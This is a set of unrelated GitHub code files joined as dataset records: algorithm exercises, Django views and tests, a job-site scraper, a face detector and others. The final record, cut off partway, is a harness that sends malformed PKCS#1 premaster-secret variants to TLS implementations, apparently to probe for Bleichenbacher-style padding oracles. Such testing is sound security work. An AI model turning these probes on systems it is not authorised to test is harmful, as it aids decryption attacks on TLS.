풀이 (브루트포스)\ndef warmdays(T:list) -> list:\n res = []\n \n for i in range(len(T) - 1):\n day = 0\n for j in range(i+1,len(T)):\n if T[i] < T[j]:\n day = j - i\n break \n res.append(day)\n res.append(0)\n return res","repo_name":"changdaeoh/Algorithm_study","sub_path":"ch9_Stack_Queue/Q22_Daily_Temperatures.py","file_name":"Q22_Daily_Temperatures.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31340211999","text":"import asyncio\nimport datetime\nimport logging\nimport signal\nimport sys\nimport threading\nimport types\n\nfrom python_sdk.service import _service_config\n\n_HANDLED_SIGNALS = (\n signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.\n signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.\n)\nif sys.platform == \"win32\":\n _HANDLED_SIGNALS += (signal.SIGBREAK,) # Windows signal 21. Sent by Ctrl+Break.\n\n\nclass Service:\n config: _service_config.Config\n should_exit: bool\n should_force_exit: bool\n started_at: datetime.datetime | None\n\n def __init__(self, config: _service_config.Config) -> None:\n self.config = config\n self.should_exit = False\n self.should_force_exit = False\n self.started_at = None\n\n @property\n def elapsed_since_started(self) -> datetime.timedelta:\n if not self.started_at:\n return datetime.timedelta(seconds=0)\n return datetime.datetime.now(tz=datetime.timezone.utc) - self.started_at\n\n @property\n def _on_tick_callbacks(self) -> asyncio.Future:\n return asyncio.gather(\n self._set_should_exit_flag_if_arrived_at_configured_run_for(),\n )\n\n def run(self) -> None:\n asyncio.run(self._run())\n\n def run_in_background(self) -> asyncio.Task[None]:\n return asyncio.create_task(self._run())\n\n async def _run(self) -> None:\n self._reset()\n logging.debug(\"Starting service.\")\n await self._startup()\n if self.should_exit:\n logging.debug(\"Service stopped before it got started.\")\n return\n await self._main_loop()\n await self._shutdown()\n\n logging.debug(\"Service stopped.\")\n\n def _reset(self) -> None:\n \"\"\"\n Resets the service so it may be reused after a previous run finished.\n \"\"\"\n self.should_exit = False\n self.should_force_exit = False\n self.started_at = None\n\n async def _startup(self) -> None:\n self._install_signal_handlers()\n\n async def _shutdown(self) -> None:\n return\n\n async def _main_loop(self) -> None:\n self.started_at = datetime.datetime.now(tz=datetime.timezone.utc)\n task = asyncio.create_task(self.config.app.start())\n while not self.should_exit and not task.done():\n await asyncio.sleep(self.config.tick_interval.total_seconds())\n await self._tick()\n if not task.done():\n await self.config.app.stop()\n\n async def _tick(self) -> None:\n await self._on_tick_callbacks\n\n def _install_signal_handlers(self) -> None:\n if threading.current_thread() is not threading.main_thread():\n # Signals can only be listened to from the main thread.\n return\n\n loop = asyncio.get_event_loop()\n\n try:\n for sig in _HANDLED_SIGNALS:\n loop.add_signal_handler(sig, self._handle_signal, sig, None)\n except NotImplementedError:\n # Windows\n for sig in _HANDLED_SIGNALS:\n signal.signal(sig, self._handle_signal)\n\n def _handle_signal(self, sig: int, frame: types.FrameType | None) -> None:\n logging.info(f\"Received signal. signal={signal.Signals(sig).name}\")\n if self.should_exit and sig == signal.SIGINT:\n self.should_force_exit = True\n else:\n self.should_exit = True\n\n async def _set_should_exit_flag_if_arrived_at_configured_run_for(self) -> None:\n if self.config.run_for and self.elapsed_since_started >= self.config.run_for:\n self.should_exit = True\n","repo_name":"lijok/python-sdk","sub_path":"src/python_sdk/service/_service.py","file_name":"_service.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43561229008","text":"# flake8: noqa\nimport pytest\nfrom demoproject.demoapp.models import (\n DemoModel,\n DemoModelCallableDefault,\n DemoModelDefault,\n DemoModelNone,\n Sender1,\n Sender2,\n SenderNotRegistered,\n)\nfrom django.forms.models import modelform_factory\nfrom django.urls import reverse\nfrom strategy_field.utils import fqn\n\n\ndef pytest_generate_tests(metafunc):\n func_name = metafunc.function.__name__\n values = ids = []\n if \"target\" in metafunc.fixturenames:\n if func_name.endswith(\"_lookup_in\"):\n values = [\n lambda o: [fqn(o.sender)],\n lambda o: [o.sender],\n lambda o: [fqn(Sender1), fqn(Sender2)],\n lambda o: [Sender1, Sender2],\n ]\n ids = [\"fqn(target.sender)\", \"target.sender\", \"fqn(Sender1)\", \"Sender1\"]\n else:\n values = [lambda o: fqn(Sender1), lambda o: Sender1]\n ids = [fqn(Sender1), \"Sender1\"]\n if \"demomodel\" in metafunc.fixturenames:\n values.extend([lambda o: fqn(o.sender), lambda o: o.sender])\n ids.extend([\"fqn(target.sender)\", \"target.sender\"])\n\n metafunc.parametrize(\"target\", values, ids=ids)\n\n\ndef test_field():\n d = DemoModel(sender=Sender1)\n assert d.sender == Sender1\n\n\n@pytest.mark.django_db\ndef test_model_save(target):\n d = DemoModel(sender=target(None))\n d.save()\n assert d.sender == Sender1\n\n\n@pytest.mark.django_db\ndef test_model_save_none():\n d = DemoModelNone(sender=None)\n d.save()\n assert d.sender is None\n\n\n@pytest.mark.django_db\ndef test_model_save_default():\n d = DemoModelDefault()\n d.save()\n # registry = d._meta.get_field_by_name('sender')[0].registry\n registry = d._meta.get_field(\"sender\").registry\n assert d.sender == registry[0]\n\n\n@pytest.mark.django_db\ndef test_model_save_default_with_callable():\n d = DemoModelCallableDefault()\n d.save()\n # registry = d._meta.get_field_by_name('sender')[0].registry\n registry = d._meta.get_field(\"sender\").registry\n assert d.sender == registry[0]\n\n\n@pytest.mark.django_db\ndef test_model_get_or_create(target):\n t = target(None)\n d, __ = DemoModel.objects.get_or_create(sender=t)\n assert d.sender == Sender1\n\n\n@pytest.mark.django_db\ndef test_model_load(demomodel):\n d = DemoModel.objects.get(pk=demomodel.pk)\n assert d.sender == Sender1\n\n\n@pytest.mark.django_db\ndef test_form(demomodel, registry):\n # demomodel._meta.get_field_by_name('sender')[0].registry = registry\n demomodel._meta.get_field(\"sender\").registry = registry\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class(instance=demomodel)\n assert form.fields[\"sender\"].choices[1:] == registry.as_choices()\n\n\n@pytest.mark.django_db\ndef test_form_save(demomodel):\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class({\"sender\": fqn(demomodel.sender)}, instance=demomodel)\n assert form.is_valid(), form.errors\n instance = form.save()\n assert instance.sender == demomodel.sender\n\n\n@pytest.mark.django_db\ndef test_form_not_valid(demomodel):\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class({\"sender\": fqn(DemoModel)}, instance=demomodel)\n assert not form.is_valid()\n assert form.errors[\"sender\"] == [\n \"Select a valid choice. \"\n \"demoproject.demoapp.models.DemoModel \"\n \"is not one of the available choices.\"\n ]\n\n\n@pytest.mark.django_db\ndef test_form_default(demomodel):\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class(instance=demomodel)\n assert form.fields[\"sender\"].choices == [\n (\"\", \"---------\"),\n (\"demoproject.demoapp.models.Sender1\", \"demoproject.demoapp.models.Sender1\"),\n (\"demoproject.demoapp.models.Sender2\", \"demoproject.demoapp.models.Sender2\"),\n ]\n\n # assert form.as_table() == u'<tr><th><label for=\"id_sender\">Sender:</label></th>' \\\n # u'<td><select id=\"id_sender\" name=\"sender\" required>\\n' \\\n # u'<option value=\"\">---------</option>\\n' \\\n # u'<option value=\"demoproject.demoapp.models.Sender1\" selected=\"selected\">demoproject.demoapp.models.Sender1</option>\\n' \\\n # u'<option value=\"demoproject.demoapp.models.Sender2\">demoproject.demoapp.models.Sender2</option>\\n</select></td></tr>'\n\n\n@pytest.mark.django_db\ndef test_admin_demomodel_add(webapp, admin_user):\n res = webapp.get(\"/demoapp/demomodel/add/\", user=admin_user)\n form = res.forms[\"demomodel_form\"]\n form[\"sender\"] = \"demoproject.demoapp.models.Sender1\"\n # import pdb; pdb.set_trace()\n\n form.submit().follow()\n assert (\n DemoModel.objects.filter(sender=\"demoproject.demoapp.models.Sender1\").count()\n == 1\n )\n\n\n@pytest.mark.django_db\ndef test_admin_demomodel_edit(webapp, admin_user, demomodel):\n url = reverse(\"admin:demoapp_demomodel_change\", args=[demomodel.pk])\n res = webapp.get(url, user=admin_user)\n form = res.forms[\"demomodel_form\"]\n form[\"sender\"] = \"demoproject.demoapp.models.Sender2\"\n form.submit().follow()\n assert (\n DemoModel.objects.filter(sender=\"demoproject.demoapp.models.Sender2\").count()\n == 1\n )\n\n\n@pytest.mark.django_db\ndef test_admin_demomodel_validate(webapp, admin_user, demomodel):\n url = reverse(\"admin:demoapp_demomodel_change\", args=[demomodel.pk])\n res = webapp.get(url, user=admin_user)\n form = res.forms[\"demomodel_form\"]\n form[\"sender\"].force_value(\"invalid_strategy_classname\")\n res = form.submit()\n assert \"Select a valid choice\" in res.context[\"adminform\"].form.errors[\"sender\"][0]\n\n\n@pytest.mark.django_db\ndef test_demomodel_lookup_equal(demomodel, target):\n assert DemoModel.objects.get(sender=target(demomodel)) == demomodel\n\n\n@pytest.mark.django_db\ndef test_demomodel_lookup_contains(demomodel, target):\n assert DemoModel.objects.get(sender__contains=target(demomodel)) == demomodel\n\n\n@pytest.mark.django_db\ndef test_demomodel_lookup_in(demomodel, target):\n assert DemoModel.objects.get(sender__in=target(demomodel)) == demomodel\n\n\n@pytest.mark.django_db\ndef test_display_attribute(demomodel, registry, monkeypatch):\n monkeypatch.setattr(\n SenderNotRegistered,\n \"label\",\n classmethod(lambda s: fqn(s).split(\".\")[-1]),\n raising=False,\n )\n # DemoModel._meta.get_field('sender').display_attribute = 'label'\n DemoModel._meta.get_field(\"sender\").registry = registry\n registry.register(SenderNotRegistered)\n assert registry.as_choices() == [\n (\"demoproject.demoapp.models.Sender1\", \"demoproject.demoapp.models.Sender1\"),\n (\"demoproject.demoapp.models.Sender2\", \"demoproject.demoapp.models.Sender2\"),\n (\"demoproject.demoapp.models.SenderNotRegistered\", \"SenderNotRegistered\"),\n ]\n\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class(instance=demomodel)\n assert form.fields[\"sender\"].choices == [(\"\", \"---------\")] + registry.as_choices()\n\n assert form.fields[\"sender\"].choices[3][1] == \"SenderNotRegistered\"\n","repo_name":"saxix/django-strategy-field","sub_path":"tests/test_choice_as_class.py","file_name":"test_choice_as_class.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"37585975133","text":"from pymyorm.database import Database\nfrom tests.config import db\nfrom tests.models.user import User\n\n\nif __name__ == '__main__':\n\n Database.connect(**db)\n\n total = User.find().where('brief', 'is', None).count()\n print(total)\n\n one = User.find().where(name='sean').one()\n one.name = None\n one.brief = '123'\n one.save()\n","repo_name":"oldjun/PyMyORM","sub_path":"tests/my_null.py","file_name":"my_null.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"19051581922","text":"import tensorflow as tf\n\nx_train = [1, 2, 3] # [1]\ny_train = [1, 2, 3] # [2]\n\nx = tf.compat.v1.placeholder(tf.float32)\ny = tf.compat.v1.placeholder(tf.float32)\n\nw = tf.compat.v1.Variable([10], dtype= tf.float32, name = 'weight')\n\nhypothesis = x * w\n\nloss = tf.reduce_mean(tf.square(hypothesis - y)) # mse\n\n############### optimizer ###############\nlr = 0.1\n# gradient = tf.reduce_mean((w * x - y) * x) # 이렇게 쓰면 안 돼\ngradient = tf.reduce_mean((x * w - y) * x) # gradient의 식(loss의 미분값)\n# gradient = tf.reduce_mean((hypothesis - y) * x)\n\ndescent = w - lr * gradient\nupdate = w.assign(descent) # w = w - lr * gradient -> 기울기 값을 계속 업데이트\n\n##################### 옵티마이저 #####################\nw_history = []\nloss_history = []\n\nsess = tf.compat.v1.Session()\nsess.run(tf.compat.v1.global_variables_initializer())\n\nfor step in range(21):\n _, loss_v, w_v = sess.run([update, loss, w], feed_dict = {x:x_train, y:y_train})\n print(step, '\\t', loss_v, '\\t', w_v)\n \n w_history.append(w_v)\n loss_history.append(loss_v)\n \nsess.close()\nprint('=============== w history ===============')\nprint(w_history)\nprint('=============== Loss history ===============')\nprint(loss_history)\n\n\n# 체인룰: 미분에 미분 = 미분미분\n# 미적분학에서 미분 연산의 규칙 중 하나로, 합성함수의 미분을 구하는 방법(합성함수를 미분할 때 사용하는 규칙)\n# 먼저 바깥 함수(f)를 미분하고, 그 다음에 안쪽 함수(g)를 미분하는데, \n# 이때 안쪽 함수의 미분값에 바깥함수를 적용한 것을 곱해주면 된다\n# ex)\n# y = (2x+y)^2\n# 2*(2x+y)*2\n# =\n# 4x^2 + 4xy + y^2\n# 8x + 4y = 2*(2x+y)*2\n","repo_name":"seohee1205/study_aca","sub_path":"tf114/tf11_gradientDescent.py","file_name":"tf11_gradientDescent.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8199645648","text":"from django.utils.translation import gettext_lazy as _\r\nfrom django.shortcuts import get_object_or_404\r\n\r\nfrom rest_framework import views\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.permissions import IsAuthenticated\r\n\r\nfrom decimal import Decimal\r\nfrom datetime import datetime\r\n\r\nfrom customed_files.date_convertor import MiladiToShamsi\r\nfrom customed_files.states_towns import list_states_towns\r\nfrom main.models import Product, ShopFilterItem\r\nfrom main.model_methods import update_product_stock\r\nfrom cart.views import CartCategoryView\r\nfrom cart.cart import Cart\r\nfrom payment.views import PaymentStart\r\nfrom .models import ProfileOrder, Order, OrderItem, Dispatch\r\nfrom .serializers import ProfileOrderSerializer, OrderSerializer, OrderItemSerializer\r\nfrom .methods import profile_order_detail\r\n\r\n\r\n\r\nclass ListCreateProfileOrder(views.APIView):\r\n permission_classes = [IsAuthenticated] #redirect to login page by front if user is not loged in.\r\n def get(self, request, *args, **kwargs): #here listed ProfileOrders of a user. come here from url /cart/. here front side must create form refrencing to ListCreateOrderItem, and when click on checkbox auto submit to ProfileOrderDetail.get for optaining shiping price. \r\n profileorders = request.user.profileorders.select_related('town__state')\r\n total_prices = Cart(request).get_total_prices()\r\n if profileorders:\r\n return Response({'total_prices': str(total_prices), 'profileorders': ProfileOrderSerializer(profileorders, many=True).data})\r\n else:\r\n return Response({'total_prices': str(total_prices), 'profileorders': None}) #after this front side must create blank ProfileOrder Form with action refrenced to ListCreateProfileOrder.post. (you can create form and its html elements by django modelform and say to front html elements) \r\n\r\n def post(self, request, *args, **kwargs): #here ProfileOrder cerated from Form datas sended by user.\r\n data = request.data #data sended must be like {\"first_name\": \"javad\", \"last_name\":\"haghi\", \"phone\":\"09127761277\", \"town\":\"1\", \"address\":\"tehran\", \"postal_code\":\"1111111111\"} to save ProfileOrder object successfuly.\r\n main_profileorder = ProfileOrder.objects.filter(user=request.user, main=True)\r\n data['main'] = True if not main_profileorder else False #first profileorder must be main profileorder.\r\n data['user'] = request.user.id\r\n serializer = ProfileOrderSerializer(data=data)\r\n if serializer.is_valid():\r\n profileorder = serializer.save()\r\n # get = request.GET.copy()\r\n # get.setlist('profileorder_id', str(profileorder.id))\r\n # request.GET = get\r\n return Response(ProfileOrderSerializer(profileorder).data) #why dont use like: OrderSerializer(order).data? answer: may user create second order, so we need alwayes use user.orders.all() .\r\n else:\r\n return Response(serializer.errors)\r\n\r\n\r\n\r\n\r\nclass ProfileOrderDetail(views.APIView):\r\n permission_classes = [IsAuthenticated]\r\n def get(self, request, *args, **kwargs): # here shipping price are computed and sended to front. (depend which profileorder choisen)\r\n dic = profile_order_detail(request, kwargs['pk']) # profile_order_detail set in cart vars: personal_shipping_price and post_shipping_price\r\n if not dic:\r\n return Response(_('your cart is empty, add a product to order.'))\r\n return Response(dic) # profileorder_selected is for what? answer: front know which checkbox should be selected after profileorder creation(after coming from ListCreateProfileOrder.post to .get)\r\n \r\n def put(self, request, *args, **kwargs): #here ProfileOrder updated.\r\n profileorder = ProfileOrder.objects.get(id=kwargs.get('pk'))\r\n serializer = ProfileOrderSerializer(instance=profileorder, data=request.data, partial=True)\r\n if serializer.is_valid():\r\n profileorder = serializer.save() \r\n return Response(ProfileOrderSerializer(profileorder).data)\r\n else:\r\n return Response(serializer.errors)\r\n\r\n def delete(self, request, *args, **kwargs): #here ProfileOrder deleted.\r\n profileorder = ProfileOrder.objects.get(id=kwargs.get('pk'))\r\n profileorder.visible = False\r\n profileorder.save()\r\n return Response('deleted successfuly')\r\n\r\n\r\n\r\n\r\nclass ListCreateOrderItem(views.APIView): \r\n permission_classes = [IsAuthenticated]\r\n def get(self, request, *args, **kwargs): #here listed products ordered for showing in userprofile.\r\n orders = Order.objects.filter(profile_order__user=request.user).select_related('profile_order').prefetch_related('items__product__image_icon', 'items__product__rating').order_by('-created')#OrderItem.objects.filter(order__profile_order__user=request.user, order__paid=True).select_related('order__profile_order').order_by('-order__created')\r\n return Response({'orders': OrderSerializer(orders, many=True, context={'request': request}).data})\r\n \r\n def post(self, request, *args, **kwargs): #here created orderitems. come here from class ProfileOrderDetail.get (cart.session['shipping_price'] initialized in that class) connect here with utl: http http://192.168.114.21:8000/orders/orderitems/ cookie:\"sessionid=...\" profile_order_id=1 paid_type=cod shipping_type=personal_dispatch or post\r\n cart, data, total_prices, price_changed, quantity_ended = Cart(request), request.data, Decimal(0), False, False\r\n paid_type, shipping_type = data.get('paid_type', 'online'), data.get('shipping_type') #important: if website have cod and online front should create 2 chekbox for thats.\r\n orderitems, products, shopfilteritems, lists = [], [], [], []\r\n for item in cart:\r\n price_changed = True if item['price_changes'] != Decimal('0') else price_changed\r\n quantity_ended = True if item['shopfilteritem'] and item['quantity'] > item['shopfilteritem'].stock else True if item['quantity'] > item['product'].stock else quantity_ended #if item['shopfilteritem'] was true but item['quantity'] > item['shopfilteritem'].stock was false supose item['quantity'] > item['product'].stock was true its return true in quantity_ended must be false but here it dont happend because: item['product'].stock > item['shopfilteritem'] always (because of ShopFilterItem.save.update_product_stock) \r\n total_prices += item['total_price']\r\n lists.append([item['shopfilteritem'], item['product'], item['quantity']]) if item['shopfilteritem'] else lists.append([item['product'], item['quantity']]) \r\n orderitems.append(OrderItem(shopfilteritem=item['shopfilteritem'], price=item['total_price'], quantity=item['quantity'])) if item['shopfilteritem'] else orderitems.append(OrderItem(product=item['product'], price=item['total_price'], quantity=item['quantity'])) #here this line will saved just for cod (for online after payment)\r\n \r\n if not price_changed and not quantity_ended and paid_type in ['cod', 'online'] and shipping_type in ['personal_dispatch', 'post']:\r\n shipping_price = Decimal(cart.session['personal_shipping_price']) if shipping_type == 'personal_dispatch' else Decimal(cart.session['post_shipping_price'])\r\n total_prices += shipping_price\r\n order = Order.objects.create(profile_order_id=data['profile_order_id'], paid_type=paid_type, paid=False, price=total_prices, shipping_price=shipping_price, shipping_type=shipping_type, order_status='0')\r\n for orderitem in orderitems:\r\n orderitem.order = order\r\n if paid_type == 'cod':\r\n for L in lists:\r\n if isinstance(L[0], ShopFilterItem):\r\n L[0].stock -= L[2] #important: .update is completly seperate method from .save and dont run .save so we need update availabe too. reference: https://stackoverflow.com/questions/33809060/django-update-doesnt-call-override-save\r\n L[0].available = False if L[0].stock < 1 else True\r\n product = update_product_stock(L[0], L[1], saving=False)\r\n L[0].previous_stock = L[0].stock\r\n shopfilteritems.append(L[0]), products.append(L[1])\r\n else:\r\n L[0].stock -= L[1]\r\n L[0].available = False if L[0].stock < 1 else True\r\n products.append(L[0])\r\n OrderItem.objects.bulk_create(orderitems) #bulk_create create several objects at less than or equal 3 conecting to db.\r\n Product.objects.bulk_update(products, ['stock', 'available'])\r\n ShopFilterItem.objects.bulk_update(shopfilteritems, ['stock', 'available']) #if shopfilteritems was blank it is not problem.\r\n cart.clear()\r\n return Response({'orderitems created successfully'})\r\n \r\n else:\r\n orderitem_ids = []\r\n for orderitem in orderitems: #note in OrderItem.objects.bulk_create dont returned eny instance and have not sulotion (maybe in later version fixed)\r\n orderitem = orderitem.save()\r\n orderitem_ids.append(orderitem.id)\r\n Product.objects.bulk_update(products, ['stock', 'available'])\r\n ShopFilterItem.objects.bulk_update(shopfilteritems, ['stock', 'available']) #if shopfilteritems was blank it is not problem.\r\n cart.session['order_id'] = order.id\r\n cart.session['orderitem_ids'] = orderitem_ids\r\n cart.save()\r\n return PaymentStart().post(request, total_prices)\r\n \r\n elif price_changed or quantity_ended:\r\n return Response({'price_changed': price_changed, 'quantity_ended': quantity_ended, **CartCategoryView().get(request, datas_selector='products_user_csrf').data}) #redirect to cart page by front.\r\n else:\r\n return Response({})\r\n\r\n\r\n\r\n","repo_name":"ahmadekhalili/eCommerce-web-api","sub_path":"ictsun/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"24871921324","text":"####################################\n#\n# Databases project - UI.Menus Package\n#\n####\n#\n# Written by:\tOz Tamir\n# Email:\t\tTheOzTamir@gmail.com\n# Date:\t\t\t20 - 02 - 2015\n#\n####\n#\n# Filename:\t\tadd_menu.py\n# Description:\tThis file defines a menu that add items\n#\n####################################\nfrom menu_base import MenuBase\n\nclass AddMenu(MenuBase):\n\t''' Class for a menu that add items '''\n\tdef __init__(self, config, ui_manager):\n\t\toptions = [\n\t\t\t('Add a new product', ui_manager.new_product),\n\t\t\t('Create a new purchase', ui_manager.new_purchase),\n\t\t\t('Create a new order', ui_manager.new_order),\n\t\t\t('Add a new category', ui_manager.new_category)\n\t\t]\n\t\tsuper(AddMenu, self).__init__(options, config)","repo_name":"OzTamir/Databases-Project","sub_path":"ui/Menus/add_menu.py","file_name":"add_menu.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43663373697","text":"# Задание. Необходимо собрать информацию о вакансиях на вводимую должность (используем input или через аргументы\n# получаем должность) с сайта HH. Приложение должно анализировать все страницы сайта. Получившийся список должен\n# содержать в себе минимум:\n# Наименование вакансии.\n# Предлагаемую зарплату (разносим в три поля: минимальная и максимальная и валюта. цифры преобразуем к цифрам).\n# Ссылку на саму вакансию.\n# Сайт, откуда собрана вакансия.\n# По желанию можно добавить ещё параметры вакансии (например, работодателя и расположение). Общий результат можно\n# вывести с помощью dataFrame через pandas. Сохраните в json либо csv.\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\n\n# post = input('Введите должность: ')\npost = 'sadovnik'\n\nbase_url = 'https://hh.ru'\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 '\n 'Safari/537.36'\n}\n\nparams = {'page': 0}\n\nurl = f'{base_url}/vacancies/{post}'\n\nsession = requests.Session()\n\nvacancies_list = []\n\nwhile True:\n\n response = session.get(url, headers=headers, params=params)\n\n dom = BeautifulSoup(response.text, 'html.parser')\n\n vacancies = dom.find_all('div', {'class': 'serp-item'})\n\n for vacancy in vacancies:\n vacancy_data = {}\n\n info = vacancy.find('a', {'class': 'serp-item__title'})\n link = info['href']\n name = info.getText()\n\n company = vacancy.find('div', {'class': 'vacancy-serp-item__meta-info-company'})\n company_name = company.getText()\n try:\n company_link = base_url + company.next.attrs['href']\n except AttributeError:\n company_link = None\n\n city = vacancy.find('div', {'data-qa': 'vacancy-serp__vacancy-address'}).getText()\n experience = vacancy.find('div', {'data-qa': 'vacancy-serp__vacancy-work-experience'}).getText()\n\n salary = vacancy.find('span', {'data-qa': 'vacancy-serp__vacancy-compensation'})\n\n salary_max = None\n salary_min = None\n salary_currency = None\n\n if salary:\n salary = salary.text\n salary_list = salary3 = salary.replace('\\u202f', '').split()\n salary_currency = salary_list[-1]\n if salary_list[0] == 'от':\n salary_min = int(salary_list[1])\n elif salary_list[0] == 'до':\n salary_max = int(salary_list[1])\n elif salary_list[1] == '–':\n salary_min = int(salary_list[0])\n salary_max = int(salary_list[2])\n else:\n print(f'Check salary in page={params[\"page\"]} name={name} company={company}')\n\n vacancy_data['vacancy_link'] = link\n vacancy_data['name'] = name\n vacancy_data['salary_min'] = salary_min\n vacancy_data['salary_max'] = salary_max\n vacancy_data['salary_currency'] = salary_currency\n vacancy_data['company'] = company_name\n vacancy_data['company_link'] = company_link\n vacancy_data['city'] = city\n vacancy_data['experience'] = experience\n vacancy_data['site'] = base_url\n\n vacancies_list.append(vacancy_data)\n\n if dom.find_all('a', {'data-qa': 'pager-next'}):\n params['page'] += 1\n else:\n break\n\nwith open('Homework_2_output.json', 'w') as write_file:\n json.dump(vacancies_list, write_file)\n\nprint(len(vacancies_list))\n","repo_name":"AnnaLosevaGB/GB_internet_search","sub_path":"Homework_2.py","file_name":"Homework_2.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2179210593","text":"import streamlit as st\nimport streamlit.components.v1 as components\nimport os\n\nTitle_html = \"\"\"\n <style>\n h3{\n font-size: 26px;\n color: #2E2E2E;\n text-align: center;\n font-style: oblique;\n font-weight: bold;\n width: 100%;\n\n </style> \"\"\"\n\nst.set_page_config(layout=\"wide\")\n\nscript_dir = os.path.dirname(__file__)\n\n# st.markdown(\"<h1 style='text-align: center;'>Topic Modelling</h1>\", unsafe_allow_html=True)\n\n\nrel_path = '../static/graficos/dilma_topic_overtime.html'\nabs_file_path = os.path.join(script_dir, rel_path)\n\nHtmlFile = open(abs_file_path, 'r', encoding='utf-8')\nsource_code = HtmlFile.read()\ncomponents.html(source_code, height=400, width=1250)\nst.markdown(\"<h3>Debates organized by TV channels is the main dominant topic in the final stage of election campaign </h3>\", unsafe_allow_html=True)\n\nrel_path = '../static/graficos/dilma_TopicDistance.html'\nabs_file_path = os.path.join(script_dir, rel_path)\n\nHtmlFile = open(abs_file_path, 'r', encoding='utf-8')\nsource_code = HtmlFile.read()\ncomponents.html(source_code, height=500, width=1250)\n\nst.markdown(\"<h3>Governmental social schemes like Bolsa Familia, the world cup and the results of polling institutions \\\n are the main topics discussed during the election campaign </h3>\", unsafe_allow_html=True)\n\n\nrel_path = '../static/graficos/dilma_hierarchicalCluster.html'\nabs_file_path = os.path.join(script_dir, rel_path)\n\nHtmlFile = open(abs_file_path, 'r', encoding='utf-8')\nsource_code = HtmlFile.read()\ncomponents.html(source_code, height=500, width=1250)\n","repo_name":"waguii/twitterelectionbr","sub_path":"twitterelectionbr/interface/frontend/pages/1_Topic_Model.py","file_name":"1_Topic_Model.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31566023992","text":"import cv2\r\n\r\n# Load pre-trained face detection model\r\nface_cascade = cv2.CascadeClassifier('D:/programming/MyRepo/ChatGPT class/haarcascade_frontalface_default.xml')\r\n\r\n# Read image from file\r\nimage = cv2.imread('D:/programming/MyRepo/ChatGPT class/Image.jpg')\r\n\r\n# Resized_image\r\nresized_img = cv2.resize(image, (400, 600))\r\n\r\n# Convert image to grayscale\r\ngray = cv2.cvtColor(resized_img, cv2.COLOR_BGR2GRAY)\r\n\r\n# Detect faces in the image\r\nfaces = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)\r\n\r\n# Draw rectangles around the detected faces\r\nfor (x, y, w, h) in faces:\r\n cv2.rectangle(resized_img, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n\r\n# Display the image with the detected faces\r\n#cv2.imshow('Image', resized_img)\r\n\r\n# Wait for a key press and then close the window\r\ncv2.imshow('img', resized_img)\r\ncv2.waitKey()\r\n","repo_name":"sheinah/ChatGPT-with-Python","sub_path":"face detection.py","file_name":"face detection.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"8177695248","text":"import multiprocessing\nfrom os import cpu_count\nimport random\nimport subprocess\nimport time\nfrom random import choice\n\nimport pandas\n\nimport argparse\n\n\ndef determine_client_hello_random(log: str) -> str:\n for line in log.splitlines():\n if 'ClientHello.random=' in line:\n return line.split('=')[-1].replace(' ', ':').rstrip(':')\n raise AssertionError('There was no Client Hello randomness in the log of a client, aborting')\n\n\ndef run_single_session(request_index: int, sut_name: str, use_sentinel: bool, wait_time: float, enable_skip_ccs_fin: bool, enable_noskip_ccs_fin: bool, twoclass: bool, oneclass: bool) -> (str, str, bool):\n config_files = ['./tls_test_tool_client/config/base.conf',\n f'./tls_test_tool_client/config/{sut_name}.conf']\n if enable_skip_ccs_fin:\n if enable_noskip_ccs_fin:\n # Coin flip\n skip_ccs_fin = bool(random.randint(0, 1))\n else:\n skip_ccs_fin = True\n else:\n if enable_noskip_ccs_fin:\n skip_ccs_fin = False\n else:\n print('At least one of --skip or --noskip must be selected')\n skip_ccs_fin = False\n exit(1)\n\n if oneclass:\n test_cases = ['Wrong_first_byte_(0x00_set_to_0x17)']\n elif twoclass:\n test_cases = ['Correctly_formatted_PKCS#1_PMS_message',\n 'Invalid_TLS_version_in_PMS']\n else:\n test_cases = ['Correctly_formatted_PKCS#1_PMS_message',\n 'Wrong_separator_(0x00_set_to_0x17)',\n 'Invalid_TLS_version_in_PMS',\n 'Wrong_first_byte_(0x00_set_to_0x17)',\n 'Wrong_second_byte_(0x02_set_to_0x17)',\n 'Wrong_separator_position_(44)']\n\n current_case = choice(test_cases)\n config_files.append(f'./tls_test_tool_client/config/{current_case}.conf')\n if skip_ccs_fin:\n config_files.append('./tls_test_tool_client/config/skip_change_cipher_spec_and_finished.conf')\n if use_sentinel:\n call_array = ['./tls_test_tool_client/TlsTestToolSentinel']\n else:\n call_array = 